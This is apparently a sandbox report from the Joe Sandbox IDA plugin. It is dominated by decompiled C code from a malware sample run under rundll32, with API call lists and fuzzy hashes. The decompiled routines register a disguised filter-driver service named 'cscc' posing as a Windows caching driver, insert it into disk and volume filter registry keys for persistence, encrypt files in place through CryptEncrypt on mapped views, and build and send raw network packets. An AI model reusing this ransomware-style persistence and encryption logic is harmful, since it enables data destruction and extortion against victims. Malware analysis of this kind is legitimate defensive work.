                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                                        				long _t42;
                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                        				intOrPtr* _t50;
                                                                                                                                                                                        				short _t51;
                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                        				void* _t59;
                                                                                                                                                                                        				void* _t61;
                                                                                                                                                                                        				signed int _t62;
                                                                                                                                                                                        				intOrPtr _t64;
                                                                                                                                                                                        				char _t66;
                                                                                                                                                                                        				intOrPtr _t68;
                                                                                                                                                                                        				void* _t76;
                                                                                                                                                                                        				intOrPtr* _t77;
                                                                                                                                                                                        				void* _t78;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t38 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                                                        				_v16 = _t38;
                                                                                                                                                                                        				if(_t38 == 0) {
                                                                                                                                                                                        					L14:
                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t40 = _a16;
                                                                                                                                                                                        				_t61 = _t40 + 1;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t68 =  *_t40;
                                                                                                                                                                                        					_t40 = _t40 + 1;
                                                                                                                                                                                        				} while (_t68 != 0);
                                                                                                                                                                                        				_t42 = _t40 - _t61 + 0x58;
                                                                                                                                                                                        				_v12 = _t42;
                                                                                                                                                                                        				_t59 = HeapAlloc(GetProcessHeap(), 8, _t42);
                                                                                                                                                                                        				if(_t59 == 0) {
                                                                                                                                                                                        					L13:
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t62 = 9;
                                                                                                                                                                                        				_t49 = memcpy(_t59, _a8, _t62 << 2);
                                                                                                                                                                                        				__imp__#9(_v12 + 0xfffffffc);
                                                                                                                                                                                        				 *(_t59 + 2) = _t49;
                                                                                                                                                                                        				_t50 = _a16;
                                                                                                                                                                                        				 *((char*)(_t59 + 8)) = 0xa2;
                                                                                                                                                                                        				 *((short*)(_t59 + 0x24)) = 0xff18;
                                                                                                                                                                                        				_t76 = _t50 + 1;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t64 =  *_t50;
                                                                                                                                                                                        					_t50 = _t50 + 1;
                                                                                                                                                                                        				} while (_t64 != 0);
                                                                                                                                                                                        				_t51 = _t50 - _t76;
                                                                                                                                                                                        				_t77 = _a16;
                                                                                                                                                                                        				 *((short*)(_t59 + 0x2a)) = _t51;
                                                                                                                                                                                        				 *((short*)(_t59 + 0x55)) = _t51 + 1;
                                                                                                                                                                                        				_t18 = _t59 + 0x57; // 0x57
                                                                                                                                                                                        				 *((intOrPtr*)(_t59 + 0x2c)) = 0x16;
                                                                                                                                                                                        				 *((intOrPtr*)(_t59 + 0x34)) = 0x2019f;
                                                                                                                                                                                        				 *((intOrPtr*)(_t59 + 0x44)) = 3;
                                                                                                                                                                                        				 *((intOrPtr*)(_t59 + 0x48)) = _a20;
                                                                                                                                                                                        				 *((intOrPtr*)(_t59 + 0x4c)) = 0x40;
                                                                                                                                                                                        				 *((intOrPtr*)(_t59 + 0x50)) = 2;
                                                                                                                                                                                        				 *((char*)(_t59 + 0x54)) = 3;
                                                                                                                                                                                        				_t54 = _t18 - _t77;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t66 =  *_t77;
                                                                                                                                                                                        					 *((char*)(_t54 + _t77)) = _t66;
                                                                                                                                                                                        					_t77 = _t77 + 1;
                                                                                                                                                                                        				} while (_t66 != 0);
                                                                                                                                                                                        				__imp__#19(_a4, _t59, _v12, 0); // executed
                                                                                                                                                                                        				if(_t54 > 0) {
                                                                                                                                                                                        					_t78 = _v16;
                                                                                                                                                                                        					__imp__#16(_a4, _t78, 0xffff, 0); // executed
                                                                                                                                                                                        					if(_t54 > 0 &&  *((intOrPtr*)(_t78 + 9)) == 0) {
                                                                                                                                                                                        						 *_a12 =  *((intOrPtr*)(_t78 + 0x2a));
                                                                                                                                                                                        						_v5 = 1;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				HeapFree(GetProcessHeap(), 8, _t59);
                                                                                                                                                                                        				goto L13;
                                                                                                                                                                                        			}























                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,007B943A), ref: 007B206D
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B2076
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,007B943A), ref: 007B209C
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B209F
                                                                                                                                                                                        • htons.WS2_32(?), ref: 007B20BC
                                                                                                                                                                                        • send.WS2_32(?,00000000,?,00000000), ref: 007B2131
                                                                                                                                                                                        • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 007B2148
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,007B943A), ref: 007B2168
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B216F
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,007B943A), ref: 007B217A
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B2181
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$AllocFree$htonsrecvsend
                                                                                                                                                                                        • String ID: Oet Uet0Xet
                                                                                                                                                                                        • API String ID: 1780562090-3175316637
                                                                                                                                                                                        • Opcode ID: 51e3eb2eff202ac346f14a69bfd930b54fd9dad9e31ea5579f2401b074a953b8
                                                                                                                                                                                        • Instruction ID: 4f7261e6fd415a0a9ae122164a13cfc8a9335e78586d65c05477f30022a45804
                                                                                                                                                                                        • Opcode Fuzzy Hash: 51e3eb2eff202ac346f14a69bfd930b54fd9dad9e31ea5579f2401b074a953b8
                                                                                                                                                                                        • Instruction Fuzzy Hash: D641B67550024AABDF119FA8DC49B9A7FB4FF49304F048198E9449B252DB79D805CB64
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B1368(void* __ecx) {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				void* _t5;
                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t5 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                                                                                                                                                        				_t13 = _t5;
                                                                                                                                                                                        				if(_t13 != 0) {
                                                                                                                                                                                        					_t17 = CreateServiceW(_t13, L"cscc", L"Windows Client Side Caching DDriver", 0xf01ff, 1, 0, 3, L"cscc.dat", L"Filter", 0, L"FltMgr", 0, 0);
                                                                                                                                                                                        					if(_t17 == 0) {
                                                                                                                                                                                        						_v8 = GetLastError();
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_v8 = 0;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					if(_t17 != 0) {
                                                                                                                                                                                        						CloseServiceHandle(_t17);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					CloseServiceHandle(_t13);
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_v8 = GetLastError();
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                        			}








                                                                                                                                                                                        APIs
                                                                                                                                                                                        • OpenSCManagerW.SECHOST(00000000,00000000,000F003F,00000000,?,cscc,?,007B154F,00000000,007B11D0,?,?,?), ref: 007B1377
                                                                                                                                                                                        • GetLastError.KERNEL32(?,007B154F,00000000,007B11D0,?,?,?), ref: 007B1383
                                                                                                                                                                                        • CreateServiceW.ADVAPI32(00000000,cscc,Windows Client Side Caching DDriver,000F01FF,00000001,00000000,00000003,cscc.dat,Filter,00000000,FltMgr,00000000,00000000,?,?,007B154F), ref: 007B13B6
                                                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,007B154F,00000000,007B11D0,?,?,?), ref: 007B13DB
                                                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,007B154F,00000000,007B11D0,?,?,?), ref: 007B13DE
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Service$CloseHandle$CreateErrorLastManagerOpen
                                                                                                                                                                                        • String ID: 1u$Filter$FltMgr$Windows Client Side Caching DDriver$cscc$cscc.dat
                                                                                                                                                                                        • API String ID: 2226085316-398523495
                                                                                                                                                                                        • Opcode ID: 9e0f3c1cb7cab1eeebbeaf40d95de8b68e5192c7a4a3a58c9305e3d892f91095
                                                                                                                                                                                        • Instruction ID: 5dae5becf1fea7bd8c349663412253be6e50b243ec2264330abd17f514ca2ee3
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e0f3c1cb7cab1eeebbeaf40d95de8b68e5192c7a4a3a58c9305e3d892f91095
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E01AD71782328FBC62167A69C8DFDFBEACDB05BA1F404019B506A3540EAF84D00C6E4
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 69%
                                                                                                                                                                                        			E007B5D0A(void* __edx, long _a4, intOrPtr _a8) {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                        				signed int _v36;
                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                                        				int _t52;
                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t56;
                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                        				void* _t59;
                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                        				intOrPtr _t80;
                                                                                                                                                                                        				long _t82;
                                                                                                                                                                                        				intOrPtr _t89;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t80 = _a8;
                                                                                                                                                                                        				_t82 = 0;
                                                                                                                                                                                        				_t52 =  &_v16;
                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                        				_v32 = 0;
                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                        				__imp__CryptDuplicateKey( *((intOrPtr*)(_t80 + 0x3c)), 0, 0, _t52);
                                                                                                                                                                                        				if(_t52 == 0) {
                                                                                                                                                                                        					L21:
                                                                                                                                                                                        					return _t52;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t53 = CreateFileW(_a4, 0xc0000000, 0, 0, 3, 0, 0); // executed
                                                                                                                                                                                        				_v12 = _t53;
                                                                                                                                                                                        				if(_t53 == 0xffffffff) {
                                                                                                                                                                                        					L18:
                                                                                                                                                                                        					_t52 = CryptDestroyKey(_v16);
                                                                                                                                                                                        					if(_v20 == _t82 || _v32 != _t82) {
                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						return SetEvent( *(_t80 + 0x48));
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_v24 = 0;
                                                                                                                                                                                        				__imp__GetFileSizeEx(_t53,  &_v44);
                                                                                                                                                                                        				_t73 = _v40;
                                                                                                                                                                                        				_t69 = _v44;
                                                                                                                                                                                        				_a4 = 0x1000000;
                                                                                                                                                                                        				_t89 = _v40;
                                                                                                                                                                                        				if(_t89 <= 0 && (_t89 < 0 || _t69 < 0x1000000)) {
                                                                                                                                                                                        					_v24 = 1;
                                                                                                                                                                                        					_a4 = _t69;
                                                                                                                                                                                        					_t67 = E007BA6B0(_t69, _t73, 0x10, _t82);
                                                                                                                                                                                        					asm("adc edx, esi");
                                                                                                                                                                                        					_t69 = _t67 + 1 << 4;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t56 = 0;
                                                                                                                                                                                        				asm("adc edi, ecx");
                                                                                                                                                                                        				_t85 =  *((intOrPtr*)(_t80 + 0x44)) + _t69 + 0x12;
                                                                                                                                                                                        				asm("adc edi, eax");
                                                                                                                                                                                        				_t57 = CreateFileMappingW(_v12, _t56, 4, 0,  *((intOrPtr*)(_t80 + 0x44)) + _t69 + 0x12, _t56); // executed
                                                                                                                                                                                        				_v8 = _t57;
                                                                                                                                                                                        				_t92 = _t57;
                                                                                                                                                                                        				if(_t57 == 0) {
                                                                                                                                                                                        					L17:
                                                                                                                                                                                        					CloseHandle(_v12);
                                                                                                                                                                                        					_t80 = _a8;
                                                                                                                                                                                        					_t82 = 0;
                                                                                                                                                                                        					goto L18;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_v36 = _v36 & 0x00000000;
                                                                                                                                                                                        				_t59 = E007B5A73(_t92, _t57, _v44, _v40, _a8,  &_v20,  &_v32); // executed
                                                                                                                                                                                        				if(_t59 == 0 || _v20 != 0) {
                                                                                                                                                                                        					L14:
                                                                                                                                                                                        					_t70 = _v36;
                                                                                                                                                                                        					goto L15;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t63 = MapViewOfFile(_v8, 6, 0, 0, _a4); // executed
                                                                                                                                                                                        					_v28 = _t63;
                                                                                                                                                                                        					if(_t63 == 0) {
                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					__imp__CryptEncrypt(_v16, 0, _v24, 0, _t63,  &_a4, _t69);
                                                                                                                                                                                        					_t70 = _t63;
                                                                                                                                                                                        					if(_t70 != 0) {
                                                                                                                                                                                        						FlushViewOfFile(_v28, _a4);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					UnmapViewOfFile(_v28);
                                                                                                                                                                                        					_t97 = _t70;
                                                                                                                                                                                        					if(_t70 != 0) {
                                                                                                                                                                                        						E007B5BC4(_t97, _v8, _t85, 0, _a8); // executed
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L15:
                                                                                                                                                                                        					FindCloseChangeNotification(_v8); // executed
                                                                                                                                                                                        					if(_t70 == 0) {
                                                                                                                                                                                        						asm("sbb edi, [ebp-0x24]");
                                                                                                                                                                                        						E007B5A11(_v12, _t85 - _v44, 0);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}


























                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CryptDuplicateKey.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000), ref: 007B5D2A
                                                                                                                                                                                        • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 007B5D46
                                                                                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 007B5D60
                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B5D8D
                                                                                                                                                                                        • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,?,00000000), ref: 007B5DBC
                                                                                                                                                                                        • MapViewOfFile.KERNELBASE(?,00000006,00000000,00000000,?,00000000,?,?,?,00000010,?), ref: 007B5DFD
                                                                                                                                                                                        • CryptEncrypt.ADVAPI32(?,00000000,?,00000000,00000000,?,?), ref: 007B5E1A
                                                                                                                                                                                        • FlushViewOfFile.KERNEL32(?,?), ref: 007B5E2C
                                                                                                                                                                                        • UnmapViewOfFile.KERNEL32(?), ref: 007B5E35
                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,?,?,?,00000010,?), ref: 007B5E54
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 007B5E71
                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(?), ref: 007B5E7F
                                                                                                                                                                                        • SetEvent.KERNEL32(?), ref: 007B5E92
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$CryptView$CloseCreate$ChangeDestroyDuplicateEncryptEventFindFlushHandleMappingNotificationSizeUnmapUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3885221687-0
                                                                                                                                                                                        • Opcode ID: fd22a8d4a92035d4ddffc0c42d8f3cc37b0e40da2984d619d8914a8d5b357ee5
                                                                                                                                                                                        • Instruction ID: 4a156e175cd5aad817a53043deb689b230af932bed12c1607b0c515bd0f3d24d
                                                                                                                                                                                        • Opcode Fuzzy Hash: fd22a8d4a92035d4ddffc0c42d8f3cc37b0e40da2984d619d8914a8d5b357ee5
                                                                                                                                                                                        • Instruction Fuzzy Hash: D5512772900219BBDF219FA5CC48FEFBF79EF08750F148125FA05A6160E7799A40DBA0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B1531() {
                                                                                                                                                                                        				void* _t3;
                                                                                                                                                                                        				void* _t4;
                                                                                                                                                                                        				void* _t5;
                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t3 = 0;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t11 =  *(_t3 + L"cscc") & 0x0000ffff;
                                                                                                                                                                                        					 *(_t3 + L"cscc") = _t11;
                                                                                                                                                                                        					_t3 = _t3 + 2;
                                                                                                                                                                                        				} while (_t11 != 0);
                                                                                                                                                                                        				_t4 = E007B1368(_t11); // executed
                                                                                                                                                                                        				_t13 = _t4;
                                                                                                                                                                                        				if(_t13 == 0 || E007B13E8() != 0) {
                                                                                                                                                                                        					_t5 = E007B11EF(L"SYSTEM\\CurrentControlSet\\Control\\Class\\{71A27CDD-812A-11D0-BEC7-08002BE2092F}", L"LowerFilters"); // executed
                                                                                                                                                                                        					_t13 = _t5;
                                                                                                                                                                                        					if(_t13 == 0) {
                                                                                                                                                                                        						_t7 = E007B11EF(L"SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E965-E325-11CE-BFC1-08002BE10318}", L"UpperFilters"); // executed
                                                                                                                                                                                        						_t13 = _t7;
                                                                                                                                                                                        						if(_t13 == 0 && GetVersion() >= 6) {
                                                                                                                                                                                        							_t9 = E007B11EF(L"SYSTEM\\CurrentControlSet\\Control\\CrashControl", L"DumpFilters"); // executed
                                                                                                                                                                                        							_t13 = _t9;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t13;
                                                                                                                                                                                        			}











                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetVersion.KERNEL32(SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318},UpperFilters,SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F},LowerFilters,00000000,007B11D0,?,?,?), ref: 007B1588
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • cscc, xrefs: 007B1533
                                                                                                                                                                                        • cscc, xrefs: 007B153A
                                                                                                                                                                                        • DumpFilters, xrefs: 007B1592
                                                                                                                                                                                        • SYSTEM\CurrentControlSet\Control\CrashControl, xrefs: 007B1597
                                                                                                                                                                                        • SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}, xrefs: 007B1578
                                                                                                                                                                                        • SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}, xrefs: 007B1563
                                                                                                                                                                                        • LowerFilters, xrefs: 007B155E
                                                                                                                                                                                        • UpperFilters, xrefs: 007B1573
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Version
                                                                                                                                                                                        • String ID: DumpFilters$LowerFilters$SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}$SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}$SYSTEM\CurrentControlSet\Control\CrashControl$UpperFilters$cscc$cscc
                                                                                                                                                                                        • API String ID: 1889659487-625840244
                                                                                                                                                                                        • Opcode ID: 7b8b074b3478e662f0bea1f8c1edd8ec8a41ffff1060f6bcd810aa9911c2c521
                                                                                                                                                                                        • Instruction ID: a2c6fcf42bedb5a0a8ecc9bb0efb087c507b18c8598a579506f36de69c7b51c9
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b8b074b3478e662f0bea1f8c1edd8ec8a41ffff1060f6bcd810aa9911c2c521
                                                                                                                                                                                        • Instruction Fuzzy Hash: 60F05472E91726970AB133A8A83AFD902815D51B643CA429CFC42B7141F64CCF1182E1
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                        			E007B6299(void* __ecx, void* _a4) {
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                        				char* _t13;
                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                        				int _t31;
                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                        				long** _t36;
                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                        				_t31 = 0;
                                                                                                                                                                                        				_t12 = CreateEventW(0, 1, 0, 0);
                                                                                                                                                                                        				_t38 = _a4;
                                                                                                                                                                                        				 *(_t38 + 0x48) = _t12;
                                                                                                                                                                                        				if(_t12 != 0) {
                                                                                                                                                                                        					_t36 = _t38 + 0x30;
                                                                                                                                                                                        					_t16 = E007B5507(_t36); // executed
                                                                                                                                                                                        					if(_t16 != 0) {
                                                                                                                                                                                        						_t19 = E007B5613( *_t36,  *((intOrPtr*)(_t38 + 0x34)), _t38 + 0x38); // executed
                                                                                                                                                                                        						if(_t19 != 0) {
                                                                                                                                                                                        							_t22 = E007B6085(_t38, _t33); // executed
                                                                                                                                                                                        							if(_t22 != 0) {
                                                                                                                                                                                        								if(E007B6246(_t33, _t38) != 0) {
                                                                                                                                                                                        									_t26 = CreateThread(0, 0, E007B60F9, _t38, 0, 0); // executed
                                                                                                                                                                                        									_t32 = _t26;
                                                                                                                                                                                        									E007B5E9F(_t38 + 4, 0x11, _t38); // executed
                                                                                                                                                                                        									if(_t32 != 0) {
                                                                                                                                                                                        										WaitForSingleObject(_t32, 0xffffffff);
                                                                                                                                                                                        										CloseHandle(_t32);
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__imp__CryptDestroyHash( *((intOrPtr*)(_t38 + 0x40)));
                                                                                                                                                                                        									_t31 = 0;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								CryptDestroyKey( *(_t38 + 0x3c));
                                                                                                                                                                                        							}
                                                                                                                                                                                        							CryptDestroyKey( *(_t38 + 0x38));
                                                                                                                                                                                        						}
                                                                                                                                                                                        						CryptReleaseContext( *_t36, _t31);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					CloseHandle( *(_t38 + 0x48));
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t34 = 0x21;
                                                                                                                                                                                        				_t13 = _t38 + 0xc;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					 *_t13 = 0;
                                                                                                                                                                                        					_t13 = _t13 + 1;
                                                                                                                                                                                        					_t34 = _t34 - 1;
                                                                                                                                                                                        				} while (_t34 != 0);
                                                                                                                                                                                        				LocalFree(_t38);
                                                                                                                                                                                        				return 0;
                                                                                                                                                                                        			}
















                                                                                                                                                                                        0x007b632d
                                                                                                                                                                                        0x007b6336
                                                                                                                                                                                        0x007b6336
                                                                                                                                                                                        0x007b633f
                                                                                                                                                                                        0x007b633f
                                                                                                                                                                                        0x007b6348
                                                                                                                                                                                        0x007b634e
                                                                                                                                                                                        0x007b6351
                                                                                                                                                                                        0x007b6352
                                                                                                                                                                                        0x007b6355
                                                                                                                                                                                        0x007b6355
                                                                                                                                                                                        0x007b6358
                                                                                                                                                                                        0x007b6359
                                                                                                                                                                                        0x007b6359
                                                                                                                                                                                        0x007b635d
                                                                                                                                                                                        0x007b6368

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007B62A5
                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 007B635D
                                                                                                                                                                                          • Part of subcall function 007B5507: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,?,007B62C3,?), ref: 007B5520
                                                                                                                                                                                          • Part of subcall function 007B5507: GetLastError.KERNEL32(?,007B62C3,?), ref: 007B5528
                                                                                                                                                                                          • Part of subcall function 007B5507: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008,?,007B62C3,?), ref: 007B553E
                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?), ref: 007B6348
                                                                                                                                                                                          • Part of subcall function 007B5613: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 007B5636
                                                                                                                                                                                          • Part of subcall function 007B5613: LocalAlloc.KERNEL32(00000040,?,00000000), ref: 007B564C
                                                                                                                                                                                          • Part of subcall function 007B5613: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 007B5662
                                                                                                                                                                                          • Part of subcall function 007B5613: CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 007B5682
                                                                                                                                                                                          • Part of subcall function 007B5613: LocalAlloc.KERNEL32(00000040,?), ref: 007B568D
                                                                                                                                                                                          • Part of subcall function 007B5613: CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 007B56A6
